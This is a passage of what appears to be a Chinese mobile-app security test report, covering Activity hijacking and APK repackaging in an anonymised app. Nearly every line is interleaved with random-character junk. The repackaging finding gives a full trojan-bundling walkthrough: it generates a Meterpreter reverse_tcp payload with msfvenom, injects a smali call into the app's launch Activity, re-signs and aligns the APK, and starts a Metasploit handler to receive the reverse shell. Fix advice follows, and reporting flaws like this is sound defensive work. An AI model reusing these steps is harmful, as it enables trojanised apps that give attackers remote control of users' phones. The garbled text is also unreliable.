; Z9 t) A8 B. A4 ]5 U+ M 表1-2 测试结果 5 V" G; I9 V+ m1 o; Q7 b; r, C: ?
) j$ H8 x. w2 U x7 P Y$ g/ z+ `
$ T( d, l" W' E: D' k* N. F: _ x+ r; m0 _
' H9 D6 ~4 O8 G: o0 ~6 |' s
8 B: N$ S0 Q. O2 ?) C! Q# g5 P3 D. M
0 F2 |. U3 @1 r. s3 |6 V1 y
& w) F; W9 q# M' A
* \6 i0 o* s1 I
! x3 q1 Z1 o3 @8 u
" J; i1 _, }/ P' m; ^
& `6 P6 _, s/ k7 ]: E8 u3 N( m, Z 2 检测结果
* h% b; @, g' l9 c1 K% A6 w: I$ G5 e! u
1 N) [; o# r# O) i' R/ _- S! q
8 p! X: {$ w$ V
2 A) h7 X* k. K3 A! f$ M$ _; w. `1 i( l7 [. U7 u C
2.1 某某某 5 S* ?/ i- i9 t6 L- }+ ]* @
q4 ]/ l3 h, t' _$ L
2 [ l9 J/ l8 @+ C- E9 x
/ H) K5 M, m- @% @
; a. l Z( Y7 @* C6 @- e; b5 ^) m" r0 H( E
2.1.1检测目标
7 J, ]6 g1 _: z4 z1 I, v+ y; X2 j7 G z9 l* L
! _1 {, K ]! Y$ ~7 A$ Y* k$ Y" n* T! D* Y. i
. [8 o; \' \ f
8 g: l$ i6 ~- D. `1 T/ a6 ^ 目标地址: 某某某某某某APP
$ m: `( W) X' V0 S& ~0 N9 V+ d8 k# a1 u d& b- G. H: y0 C
/ o& q3 R, `2 j8 v
+ V1 v+ l- m& [2 \4 Q, n! `/ H
' X! L. S; v# E% R0 ~+ I6 e
) p( m! x( D: M/ x8 l
2.1.2检测结果 / x7 h- g' P2 ?$ y7 F. k
2 }4 w+ ]: f2 ^
& m P4 G2 R. ]9 S
# V" _0 `4 X" J' I/ S# R
( K, z7 ~# s0 d9 }% W! U7 h! M) }3 H: Q d! H
2.1.2.1
0 K- o$ D/ W2 d# F! ~+ I- m \ Q6 f4 h0 y1 X2 |$ u k$ _
% w, |/ y1 A! Y! u% F
4 X, I( {) m) ]3 ?; w' X" t
8 M( I! j! P3 e! X* K- T
' `. a: b O3 g m; f# p# W 漏洞链接地址:某某某某某某APP ) V }' f2 [& ^
- m5 z+ ?; @8 w" K9 T) `
1 e7 q: ~( h W4 y3 S0 h6 ^4 h
9 R- O0 s1 Z, M; S+ ` / T Y, }* q; c7 R" u
1 |4 a6 O6 \' e, o $ ?0 W- P, y& i: i8 G8 x' ^
" ?# S+ \. \; G2 S: @0 D
/ O0 J* `5 T# w0 P3 n
r, x; S2 @+ o# q9 T
. K6 z2 N* f# C- d4 \/ Q# H! a; s9 X/ e$ q! z* h
漏洞分析及取证:
' O& _! U4 q/ O/ w4 F
- ~* ^4 t. |/ X
# W, e# P' I- k1 u/ r1 e
3 ]& _. B+ W$ R4 p. j% g/ v# S
" a- K9 s4 f$ f Q9 f8 W7 E7 ]8 G3 Q( e
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: _7 [- b1 W3 W+ o- V: `, }2 _& k
; J U6 z7 X) ^
h' ?; E' z$ x$ r9 y( ~: _5 x5 d- s# | b" d
: w! i! p# J! \! N) B" h7 A
' E1 K; k( Q* C' r9 K( N3 e1 O% j
: f2 G7 o7 e6 e8 x. t' C |* t$ b* ~
' V; [9 j/ T6 X; }8 l) [ }+ g! d! k! X* {7 q0 Q7 v
) e/ b$ z& K8 J! L3 [8 \
( b8 w. T0 z( q/ R. j4 g/ @
; u% c. B0 [) |- }! s6 v8 Q
% E. q) y4 _/ }
" ^/ G Y% U6 a6 g3 @
9 j2 }& H& f" v1 T% V6 I5 s ! l; ^# G2 ^( X ]$ C7 \
) W* `9 s( [% c b; E 2 R- k/ w2 ^( K! C2 u
0 M: W5 l. G, \# p4 W
: H; I0 S1 ^# V# R% i2 ~; F' `7 w# {- o; g! [1 ]& H4 [2 J, r
2 w. K. r9 g' @) C& F8 r% Y
" E$ Z2 J8 e. K3 p" R
( i+ n- X e0 G x6 a; N
8 \3 B" z t2 U
& f! b' z1 @: y& c* }
: O# w% b1 r) n: |0 u' e5 A! _ 8 s+ e. \, F/ H5 U+ R
; L8 T% w, w1 o4 e/ k7 l, z; g, o 8 Y q1 r4 f. [& \, w
& n% Q. x# G. L/ D Q
- n' M6 B( O6 K, V
( Y2 z5 f9 M2 {9 f5 K, o
0 K2 d6 f9 R2 d- C4 A
8 F4 H' i, j5 [& F, ]. h/ ?
漏洞危害:高
5 ~6 C E0 F q7 r6 N0 q: b6 s
2 ]; c( T% b' M! M b
4 {* V T9 l7 m$ R4 C2 r. c
9 ?7 o" s+ Z& ]5 s, K 3 i$ S, I* D7 C) h N
- ]6 z9 i: x3 [
1 L* a# O; T. |2 x, V% \; t9 D1 X
5 U1 r9 P k0 @. u/ \
' N w: E" I" y a; n6 K
: j3 L( [; U6 L" O# z$ q+ Y & _. S, e6 \ }% @
: D. U3 F8 a# F ) A! L( A0 v e8 m8 U/ |* V. I
! O2 e7 X* x* S* {9 ~* P0 B
4 G2 ]. j5 X# l4 @3 ^
2 ]0 X8 k* u5 W0 P. S9 V 严重程度 ' L) _ c8 A+ `) l C$ j& P
3 a# c' ?/ S; H$ A
, [) B' z# O" |4 E" L/ _! M+ y- V' @' O0 F$ w; H: H
|
' O* O: k+ x% h* Y, R) Y& k; O5 R9 G' R' \0 c6 f9 o8 Y1 E
# h' M+ l) K2 O/ K
* q. _1 Z( G+ h6 r+ S
$ q2 I6 x ?. P2 G& b
% I9 k; K0 j" H0 t* ^4 |- d 高 % g) ?' }1 I E
5 L) i( P% K( a
' {0 }2 @8 i+ K" v' ]) T2 n9 x! h
+ e* ~: K6 N) [2 q% M9 U |
" @: P$ v. Q+ I2 U, g- w
% F8 Q* {- x2 j6 D/ _! _' k) c6 N 3 Z' e0 [) U" g# g+ M4 o% c
7 A# y* y, C4 w' _& x& s
( S+ J h, r, T! u2 X* V
0 F. O0 y9 m: v4 o* g# ~% j; v ■
$ K6 I5 h0 t8 i. z/ R% D
7 a" a( Y. m- D$ V$ B& Z * ~) I, s. ^) c% i
% i2 c* I% N5 a |
. B- |5 s4 m* b" w d( t6 z7 i0 w) ]3 J8 L/ d! U
$ h) o" E; j1 o
8 o3 k$ I6 M3 {# g
/ _6 S1 [+ r% F+ E' v" { m2 Y7 [0 q3 ?' G2 `6 I. A% y! W
中
& ]8 D2 O( G! v$ y" h
( s9 ? F8 I7 @8 r8 l; g: I9 H 3 C$ b9 M1 I: r5 _7 l, D
0 E8 u+ }% Y* ]2 _
| 2 ]. k: f' R* M, v/ M- E
: _. g/ c% s, e8 a( {
- Y o" B, R8 s+ B- P6 G o
5 n' f) o+ Y. ^- j 7 s& {/ Z4 y+ V+ }) `# j
" e# B& i7 U9 a+ h" M; F
, S0 c9 ^; X: `+ Y$ U! S- O3 }8 q* {- N& K' N6 Q7 C- X
, }9 r( h- L7 V# Z- s! O2 f7 l) {8 ^4 y/ H/ `
|
! Z3 Q; C p9 x* y
& t& z7 Q7 C& z$ g! `. _
9 i) v$ B) M$ z* w4 q( \
0 ^" v) ~ A8 A2 X9 y. k: | / T2 K$ X) b; E$ O' w/ [8 a
9 m/ P1 w7 K7 ? ]% G/ i' ^ y
低 % v& ]2 J6 a5 M0 N+ j/ j
" A! d3 K7 ^4 F/ R7 I! l2 j v+ h/ b8 b9 o6 m/ h |$ M3 W& F
* Z @' C) |& D! G4 v" m
| 1 N8 g- w, `7 S, G
# ^) Y6 X: i5 R+ C
1 ~& }' {2 q, h A
" R, |% X: K9 [5 G, d4 I
, P: W% \$ B" m3 @2 ]0 G! g* _. H E5 t4 S$ l. E) z
- [9 d: c. ~- ^* a8 c/ t% Z# E9 G! ?4 p- F }
; g* ?, t( X& i5 ^- \, B& s
! b6 T" w9 H c! b
|
9 c6 y: J6 K% r" e7 G, Z, ^) ^% z* P( U) V
; m2 ~* z f9 s" Z3 V
8 B: W% ~9 D2 H; q+ e/ [
6 i- \2 x2 }! @" b% J) E" x
2 o! [8 Z& g, ]9 I# ^8 }- j
7 w% D1 y5 }3 ~8 {8 Q7 k6 _$ l
" n9 N, ~# a1 }" ?( t" ^' ~ % x; J0 j; q& W
) {4 _/ I5 V7 z/ o j3 B. G: w6 G
# L. }( U" \$ o' g: a$ k& L# {% M8 y& \- T+ e
: i( Q$ y5 Z- x L0 H
# ^- N4 \3 }4 e9 P8 k
( S5 w# Q, E/ B- S4 y2 k
1 U/ B% o! h1 O7 B5 R8 O$ y8 e; P# A ( X* g9 y2 O& L
# y4 u5 f e: g8 L 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
: Y6 U" e1 F5 b/ g
E! {6 _# K% {) J7 Y% A8 S
6 P, {. v6 k) v% D: N4 g
0 Y3 P& R6 L" ^6 Q( Y/ D 2 Z; q% D0 s% B. x( \
3 `* S* Q G1 R, v* Z% {$ h
$ M6 t8 j* @& {8 {; ~& O U' n
; i3 L1 q# ]0 E
& ~7 N9 \* }1 c+ Q* o4 H( a: X, O" `5 W9 g& _
/ q# _, O. z. r& _. B- R0 w' x- X4 {6 J4 p: ]
: D; V+ p3 v; a+ i
# E; }/ W! T4 }3 R+ ]' S% T3 V, ~( @0 _
) ]: |( c3 e( `$ H' a+ S
+ A6 [5 r8 t7 }+ A" n+ i7 o: e 3 j7 I8 h' i/ v% m7 Q
( O6 z) d3 z* b' L
2.1.2.2 & J m: _& i' @" @5 D5 F
# \4 ?4 N3 _' `. s T- Z
Y# j' d! Y8 T; P4 a1 C
- F9 r0 }* S* X4 q( v
- n' c# S/ q! S- i. d
0 h9 X$ M2 H$ k. X
漏洞链接地址:某某某某某某APP
+ W% z8 |( G- e6 r6 Z/ @
% ^; }2 y% u8 r3 Q: N `$ `" |3 H; D
5 X0 n u/ G6 v; _7 ^5 V& l- T+ [$ ]+ z" h( S
7 I9 d1 z' j* i4 t' h p
! G6 ]0 u* \- {: n3 ]5 C0 a8 v 漏洞分析及取证: * D( |3 a- i( h A2 I- k
; h2 M/ o7 A9 e; U) a, h; F
) {0 Y4 @1 }* p% Q* N' d
{4 w* U9 \4 N/ M
# Z' _2 u5 j' I) P. ]
* W! L; W. m0 @8 W; v6 H
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ( S% ~3 M0 U5 s+ j5 L
) h# {+ G6 D. x0 f1 [6 U3 o, t: P
J& G3 D1 P+ ?" ]% M
( z6 f! H3 T% t# b v$ n / l k% ~5 Y, d
1 `0 @. u4 p+ | 用Metasploit 生成木马 apk
" N2 F7 u. d2 r
7 \' k4 V+ _$ X: u: N% x
k# `2 v& J* F3 ^
; V) m+ y7 z" c( T
6 G- F: y; f3 ]* ~. b4 q6 e' P/ p `3 y( o5 B
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk # e. f% _; r# P8 |
) h2 v: S% A: g: T4 I. b
- V P) Q2 ~& A0 d' K4 n
7 ?4 h; I/ B7 w+ s
. y( X) b4 ]" _) |
3 S: ^9 ?( R# }9 j: b, N
反编译目标apk和木马apk
E3 O( v* p) x7 u) e8 {6 t' }: ~& A: l6 S$ i
. N; d1 V) L U6 c3 r8 ]6 Z: k0 A! H U
5 ^% X# N. G5 _, j5 Q2 p- {
( b" k, |: j3 N) u apktool d target.apk
6 o1 B1 w+ v, j ^; R
1 ^5 y( D6 |/ N8 A0 } apktool d cockhorse.apk
. N' }6 M: O# g' H
/ R- s! W6 f6 K5 r
* X9 K) A8 {+ Z* X0 D' g: U% e
* H# |7 E" @. P5 H' v
+ W7 ]0 i p8 I$ d5 l" L& F: {+ u4 P$ u1 A T6 L
木马 apk 注入目标 apk
& O2 u) w3 q% i/ |' r
) R6 C- y8 I. U( N9 ^0 V
( g' o: u d" D+ E2 |. s
0 z7 m' Z% U: C1 K1 w " r( H. s9 ]3 j0 i# E
. i4 {2 A# H8 F
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
, n' R6 O$ H$ X2 [) D. @9 [6 h$ m! P! M. h3 e r
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
( h6 d ]6 K- w+ w5 ~
# D/ \ I* p4 v
4 c) S7 V+ Y% |/ e# q3 k: ]/ C8 B
k+ _( N& @/ v" m7 a
! m/ k5 A2 | r 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
- j8 b1 z* b$ e% m$ r( W" R% j* B O# K
7 E! j& R" A) @- G' Q
( V3 c5 |; e( u# o
1 F7 Q2 [( o4 |
* S/ o6 G Q1 y& i6 N 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
0 k }1 ^: F! X: X$ }7 r0 D. b
; W5 y4 R8 y1 [+ Y# l. @
0 `; \$ F8 W3 w4 F* G4 v* U( X4 {( a8 h! m8 W2 ~8 P
$ @% y1 }9 [8 a, R) }' _# w `- k( h
4 `, ^+ H& `! b# \6 Q- b 回编译生成最终 apk
3 K; b' v- D. k6 Z; p a! s* L. R
& y0 Z. |0 T) @3 V, u2 W
: m0 |, a5 M( w) {' [$ C4 A4 x* e; W
6 |" n7 q6 ?/ J7 E, z, Z% ~7 w' X
- Z% K( b' e% ^ 重新打包
L: R1 j; `6 U: Z5 o: n R3 P
. i0 H3 r. b/ ~% {
7 q- z0 y0 O# ~% ?6 p
# C( f9 k: Q! ~
5 |* }0 c8 T! S
4 i# i4 D. `" E, @5 c2 { apktool b -o repackage.apk target_app_floder
! w3 W! ^( S+ t/ J3 K
7 v" e( I! D& R. e
3 A* W/ f x/ Q" z5 g8 I
# t. t0 E$ |9 ?
- i5 `1 B. Z/ o
: t; g/ z6 m8 G* L. C4 W) K3 ^) O 创建签名文件,有的话可忽略此步骤
% W2 ^: ]) `: v1 _" d1 q
9 U4 ~, M4 k6 q8 a4 F3 a9 V+ B( i( \
( C( \$ k) u! I
/ X1 Q2 W8 ~: L5 K4 ~6 e( u
7 ~) U# d0 F: S' d" A7 U
4 @( E2 t! G; Q& f/ o- \ keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
0 x7 X, v, H. K2 Z6 c0 J Z3 ~9 ^1 L" A
f$ B; ?5 L# Z6 `5 o3 @
+ I3 l7 s' v" t1 L, [! M1 H 5 }& W' \2 o$ ^
' w) t" z+ S3 A- o% u. B4 m 签名,以下任选其一
- {( b( c+ ?1 o4 f7 @ X9 z% J2 X0 w& c& e q' ^
4 R' `' A0 z) J; \5 S6 u; j/ F5 ?# ?
+ H9 V) v: I a) f: T2 r% p* _
9 N0 B4 U+ i, S1 K
jarsigner 方式 8 K4 K3 b, A2 U. T/ Y# x' U; g
" Z% r4 Y" X3 A; }8 m: \
. F, A4 H) T/ q. L. |" p
4 u( v: K7 e2 N& J
% n- s- f$ y# J* L1 O7 i: g5 h- P, t) l+ b
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
' q2 [4 b3 c! q9 |( c/ O0 U4 s* N( \
6 m1 B7 u2 e! p5 Z- w! t7 ~8 R
5 L" u& j! P& s! _, Z
1 `+ n- Y$ Z( e0 i2 q' v0 w/ ~3 l
; b& t' }# z+ R
apksigner 方式 5 v4 u- A7 I* W3 w8 x
6 J* `1 b! K! C
8 V* R- ^& t* D+ q9 t# `% `
$ l0 v0 @% O( \1 Q# s& X
" \; m* I/ }6 M: h6 r' X
) J+ ~3 T; d& u9 b9 G apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
8 d3 h# ]0 B7 a+ @2 {4 A( o: E1 O) x9 ?
' t/ H; N3 z+ h6 B
s0 t. u6 @1 `' ~4 A" g% e2 T ~
: G% r* [; I+ _0 Y m7 y0 P& m, w; p8 _! n, r$ u
如需要禁用 v2签名 添加选项--v2-signing-enabled false - _5 z6 B' v4 K9 ^
/ z( `& y) s: c
& b4 e; Q9 g$ n* h/ O
) ^ R! R8 `/ o! x/ E! W8 z- G
" e+ E8 S. Z5 B L' M% h
0 j5 g! L+ m5 @3 f 验证,以下任选其一
' _& b; ?" r# }
) q) j- N2 h* U% i9 a1 l% @; Q+ h
; C6 s) F& V+ R, L9 S
$ A! J# Q; Z2 z( k3 t* G 2 H5 x; g! | ?8 |* d
# ^% O, i* h; s1 N- k jarsigner方式
7 R$ j# h# ?1 [$ V7 F% H' t. P4 P) C$ K0 P, l$ X$ t# Q
; n) X+ V6 a9 n5 X- x/ p+ q
- A( T1 t* ]4 F
$ a: F& C* V- `+ d- ?( r8 c7 g
) l" R% E3 Q$ d2 {) |" u jarsigner -verify repackaged.apk " x/ E0 @7 x% v& N0 Q3 S5 K( o
9 m! R) i' J- o: @ K0 @
z. b7 J: ^9 t' x7 c" P( b- q
! ]2 H; Z. T B, @ ! \8 b! w W+ i6 C8 v {% L
% b5 j" i G" a4 t+ P5 V6 U' x apksigner 方式 & |) A; e5 o* w/ ?) a) Q: q
! W7 Q1 m5 v4 R6 z9 q! K0 U4 i5 o8 r
- J! ?- S: d. F K/ A# R& E0 [1 L* ~! n3 ]
2 K. H4 r( ]5 Y" G" O0 }, D+ X- {6 ^3 h+ @
apksigner verify -v --print-certs repackaged.apk
9 W K& B) q8 F+ u F* L, ^
* h/ v: Q8 u2 Q! [6 t
2 T# z* Q: ?+ A4 `# L6 t; B" v: l' M
5 e% j ^0 e4 J+ B. r* a
* B9 {* Q4 X) |4 ]7 s+ H0 V+ E, C$ O4 t F2 T. \3 `
keytool方式
/ D4 W5 r3 C; q; L( }1 E$ ^% G% R3 [( q/ s+ q B- _1 E
, d8 w: }+ }9 H* [, U0 c. y
# f% v! Q4 I# b: O6 U1 p
' x7 K: w; G+ t. T5 v: [ y0 k5 j/ W; C4 u" E" }# Z! O, l
keytool -printcert -jarfile repackaged.apk 9 Z, l/ K7 y; ?. n/ ?
( `8 S c3 [- u
: |* M# i2 b. g; Q
I- ]% v$ {. b% s
9 C- E8 p- [$ G. n9 B" H; M
' V/ {4 G7 z7 M0 X: B+ W& n# m
对齐
+ a5 n5 D; ^- Y- `, ]! @' E0 M# y" J7 u/ i3 x% e/ R7 j
- z) B7 k3 x$ ]' K* G5 Q& W( L
q/ f0 E, f- F3 y
6 F# c) b) s7 S8 B# o( R( V# Y
8 z7 e" l' b( i/ ^$ r2 z( r7 | 字节对齐优化
! B# j/ C7 F+ O- e& t0 L3 V
. e, W4 t. Z( t0 J# y" E2 h
3 C$ h' c o8 Q. H7 Q' Z8 @* a
* v: l" A8 a2 Z: b3 X
: c5 x6 O/ q$ i& [8 r
3 D) N& b) P. Q- \ zipalign -v 4 repackaged.apk final.apk ! h( W2 a* |! c+ \
1 Z9 C% s5 H; ]- F) \
3 v/ }3 n- T, ^, D; R
7 n- \% T$ X; {
9 {" X* D% V" T% j2 n- A7 C* T: B& [/ X1 K/ S* Q
检查是否对齐 , q! o* `4 d X# A5 O7 t, P: t
' ~1 L8 I0 Z: e3 K) S* i
0 q. T3 ?3 v% G, j2 K
q9 m$ ]& Z* y# f* x
6 X7 E0 F4 Y0 m/ i j' u" [1 e/ B- e+ \
2 [8 `1 j( e9 o, |( q0 S zipalign -c -v 4 final.apk
+ v( V, }9 d* ^6 k1 x, m: n4 a1 f! u5 h" S. u% h: _
" d @$ ]8 D; Y+ {* x
e0 l5 U2 Z/ t- B, w
% q1 X" g7 ]4 ^% k' _( W
/ G) m! b1 y# Z' N/ L7 v& o+ V& D 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 6 R$ y1 t4 |/ f- {0 W" r2 V
4 @5 C; X1 \" o% A, d8 ]% x
( U( b) V, E6 U. F" I7 h7 U5 Y/ m$ w$ y% i3 h4 Z/ h3 x
9 W: o" L$ F, j/ l1 i3 ~6 F6 v x7 u6 O
: X( K0 O. k4 j l1 `7 }% C
启动Metasploit控制台,配置参数等待上线
& S# O! c& D4 ~( s4 @: Q# X: R# ]7 e! H
9 L1 ]0 p$ X, n$ T+ h
5 f4 v( O( L2 C. a. z! v7 e " V1 W1 F1 h G- x$ K$ s! E
' t8 H; |% X/ D" L8 H1 e" E9 _% q |
在终端依次输入如下命令
. @& v+ s$ C) z# l
- P+ J5 i6 [6 N1 E4 z4 f: D; c
' h$ E& C7 R4 E- ?( e$ t/ m$ n) k! K
p; J6 J- y3 o. t( q2 h' S! x% G9 q5 [9 w8 e# l
msfconsole
" ?0 m2 i9 ]8 q7 z0 P* v, b6 V% G# ]2 N$ W3 P8 r
" O7 e4 X' t2 Z9 I' f z7 Q, A" |, ~: j2 s4 u$ L: x
, o' o4 l2 p- ^9 P4 b/ u: j7 ~7 U$ z6 [7 ?. |9 h/ E8 `
use exploit/multi/handler - \; r, h* p3 ?% P3 Z2 n
1 R3 N& K9 y4 |0 b6 j
0 k, t9 [" i1 P
$ o. }. a8 b! N: O8 q 8 g5 [4 \1 w9 v
. U8 Z+ n; r# T) G set PAYLOAD android/meterpreter/reverse_tcp % t* k4 _* ^- o) V# O
- ?- z# _2 ?) Q% `3 D7 |
5 ^! w$ m5 |- M5 z# G7 y+ s7 W+ o I+ I! _, H: y8 u
, k4 ^1 U7 G- ]
" [3 Y' D# G4 M/ Y x- E
set LHOST 192.xxx.xx.xx
( C4 w# k% i5 A6 M- O7 L1 M9 k* T: y2 M2 p% w4 P8 d2 T, l
b' T8 N0 d- f' R% C: Y
S+ C4 V+ J5 l7 b 0 L7 V: [& s. o% \' @4 w
6 Q) a; R; r9 Q) g8 h. g. ]+ }* }
set LPORT 4444 0 K. d2 v: U" J+ N( ^$ E' O
2 Z% P6 ~: p/ v6 j: ^ G
3 `/ i- C, ~+ s- _% Y$ G! n# m* H( W3 L% c: y I
8 ?! F& O6 h+ X/ [5 L6 I# q# F f* E
exploit / v) ^* t8 R4 B
4 y1 P, I `- E( A: G$ Z, h
2 x6 ]3 t/ s1 J# ~+ ^4 l
) f' {/ ~! }8 _& S : a( B! z$ P6 x0 T
2 i5 _: Z( o, m* @& b! W; L% Q 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 9 r5 w" E: i0 N- @; B( a
& \9 `. U' y1 Y7 N" b7 Y& c
0 q0 A2 {5 w" y) Q1 f8 S' {8 D$ e; _& r& E6 H
9 f+ s" e5 M2 k* O* H- c
% z- G/ r/ n; T) a4 Z 漏洞危害:中
2 h8 s) X( r( q0 x" x7 E- ~; Z4 n$ g ^- c1 f
: \8 X& b1 ?9 O. @) v
$ o7 g, G W) m6 v: V8 d* x. P / @. X, ]4 [- P3 |5 V
2 n, w" I* {' t+ \' u; P * g% [4 y- Y* o
) W v! V5 C3 l) d) h @
+ D& r" H% \. I1 @9 y9 x# X$ H- W# `; ?) f8 V
5 `6 E. }3 E: U6 _' U
M# Y; b9 o. ]$ G * }$ F7 X& Z4 _" d# B8 v
0 f0 s- k/ o2 n# d' B8 R% U G Q4 q
3 r# Q: M/ W9 T1 r8 b# [# E
# Z. I1 h r+ @$ z5 ^
' A! T; @* g, D, l1 H
; r' `) g; k$ D
严重程度
, a0 c9 n& D/ C6 e% s; s9 z+ j# A4 Z0 w* ~2 ^( s
5 i, R7 ]6 E: I( E6 v
, V. N8 b" E f1 l* o$ v' \, ^+ O | 6 S4 Y, H+ _' T, ?# q
% P! w3 N4 A; _" q. W8 r: r ) `7 v" k" s$ O- I1 Q9 d. o! Y+ g7 C
; M$ M# Q3 g9 K$ T7 c% a
5 G/ w7 H. u! M! H% D% K8 o+ C/ [$ Q
高 8 z4 B. F% J9 x8 L& K( h4 H
. |( g5 H0 E# x7 y( P/ F
# a% d+ O0 ?9 j+ p& r3 V. ^2 @# M' w. R5 K8 |5 V" a0 E8 y
|
. U# j, Z9 S& Y# x
; \: W4 M* g% Z: h. d$ a R. k8 v+ F8 _% t
* ?' b F6 Z6 m * A! e# h5 i0 ~% J. A, t
" L9 @& a' M5 J3 p) f" l" I
■ ' G/ [' N4 n9 ~; ^+ b) ]
2 E- L* c) V" Z8 v+ d
# S/ h: Y# Z6 \: R/ x! D: B3 r1 h6 B( ~- D8 `$ ?$ P* i3 W$ Y( [3 |
|
# J$ J4 G) r: }: l# p6 [- J
& |. V3 N; Z6 a( P0 C- O
; H& H4 [8 Q2 U; s% ^3 d9 p: w" `) w2 v
5 w5 K7 v# h* g/ W
! A$ n1 r! q( ]+ \( n6 C; D' r' f V e B" T6 g$ b/ J+ Z
中
. F0 f, n4 j; D4 L5 U) d6 W7 W/ x! Q6 N; A
% p/ \# I6 }$ Y4 }% V; D: R
. i- l, H( \6 D: t' w/ b( z |
* o0 e o" z9 ?% |9 o4 w+ f
8 p6 r, y M/ M1 x. q3 s : t5 V! B5 Z7 ?2 d9 u
1 ?! {7 z$ K) ?) m7 \8 f- s
% Y7 C# {* f3 V0 O, U+ Z. Q
5 z7 }" S; B# ^1 s, _ 7 ?. J/ y7 q6 h- ?6 T: L
p( B# u( I* T5 i6 Y
8 h* j3 Y8 v; H$ K4 v, f5 ?4 s+ A2 u7 F6 o1 J) Z' J/ e6 b. w! ^7 s# I. w
1 F% g* e5 Y% C: l% t: M
+ q/ W& N4 O7 N) B: G0 {3 Y5 i |
0 \1 a+ c8 P7 {* I2 ]/ M' q5 B
' d5 n& A2 _7 h7 b I
5 }' _2 f a# @, L9 \! i* h8 M Q& p! ?8 X
6 {: z% e. u0 R+ F, o
5 T$ V, z. b) Z7 @1 d4 r- V
低
( H- k, c' s% n, B/ |$ ^5 t- V; R: ]7 S8 P. ?- A4 y
/ H& U& O: S- S2 t6 |- N; [5 Y+ |# X7 s; u. B! @1 X
| , W. Z* a/ N# {
3 I; k. t5 ?" p. ~, b
9 W2 |/ j4 H" j7 j
% y* `9 S9 s( @ j7 a) R
( n+ x' I2 h$ Q& W( F8 B# k2 \3 f. Y+ z" J, k; d% F6 s" \
5 A" @; L6 q( n5 C+ h/ a0 h$ i; x
( i, ^8 p- c$ g* W$ u) t5 P
- R4 p2 |6 q+ E0 I
5 f7 H. F3 Q1 ~- x y6 X0 u
8 t; ~' n8 s6 t* d5 G
|
" M5 R/ Y. {, Z- n( }) ?5 q
) [8 W6 G) a4 {( O
7 t0 v1 @8 C/ m5 t% l4 N( M& x& X$ b+ U3 c
/ }' ^# I4 v2 Z* `# v- ?+ D q
2 P" n, a, ] i4 u/ N: d; I
( j: y+ R( f5 e' O+ \; o( H B4 a; p! u* z
5 Q3 h8 ^$ h4 w9 R* G& o
" H# v) b$ ?; @. j$ x
: P1 i$ }" U9 W5 b0 B+ }
6 }! o5 z6 a% [' B! U: \& @8 S$ | # W9 p0 Z, A4 z$ |6 f3 u
1 ~" p( f5 ~" q$ Z( f& H' P) ^
* j5 _0 Y% c- b% h9 N, |
6 Z* U% }2 y3 `0 H1 j' o; M6 K
2 ]/ k: I, h3 T5 V/ m1 j4 R
5 g" p6 Q' c& N 修复方法:
" ]5 k. _. D; f2 }, t4 I$ N+ C s" h# |, \+ u* n
3 }* S# ~4 L+ h) @# x# f
' f% l( v! @, n. i- f7 [. L
9 N% J6 Z' L" y& R; b. {
+ s. |2 y. p$ j q 1.在 APP 启动时应做签名校验防止二次打包。
0 u% _: q) A! e9 U
0 z" Z# a X' A9 p$ j, J1 N 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 , B. d) x: o0 O; [0 D
. K4 G# |- Z- O8 \$ Z7 D
. A1 s( Y1 f* q3 Q$ Q$ x$ q+ m: {3 b4 t' Y
! ~# w$ d+ N: T1 r$ I( w7 E* L+ R5 u x/ W- w' i. `" @6 H5 h6 @
9 v% A6 S5 n& j/ I
) ?- x5 F# j" e3 C" n0 ?
" a- S. B. g7 [7 l
4 E5 ]9 m" F9 z
( R9 {& M8 q2 f' n
; u7 N- }5 S0 z$ u" |. b
; B% N7 n4 x. O, y5 D) O1 H- M% A; f; @, I0 ]
/ ]$ c+ l' Y7 y
7 Q& L, m2 T6 Q5 |& |, l
: ?$ N5 l R" x( A5 v- h& j
8 ?0 g/ g% a( ?3 w7 V1 P
) n& A) S+ ]* j
! Z9 n' B. ~- F; E. l, e+ s- W% B